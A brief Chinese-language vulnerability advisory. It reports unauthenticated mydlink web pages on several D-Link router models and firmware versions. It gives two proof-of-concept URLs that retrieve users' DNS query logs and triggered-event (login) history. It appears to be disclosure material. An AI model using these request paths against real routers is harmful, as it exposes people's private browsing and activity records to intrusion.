具有mydlink功能的D-Link路由器存在一些无需认证的Web界面。攻击者可远程获取用户的DNS查询日志和登录日志。
受影响的目标包括但不限于以下最新固件版本:DIR-817LW (A1-1.04)、DIR-816L (B1-2.06)、DIR-850L (A1-1.09) 和 DIR-868L (A1-1.10)。
PoC1: http://target/mydlink/get_LogDnsQuery.asp
PoC2: http://target/mydlink/get_TriggedEventHistory.asp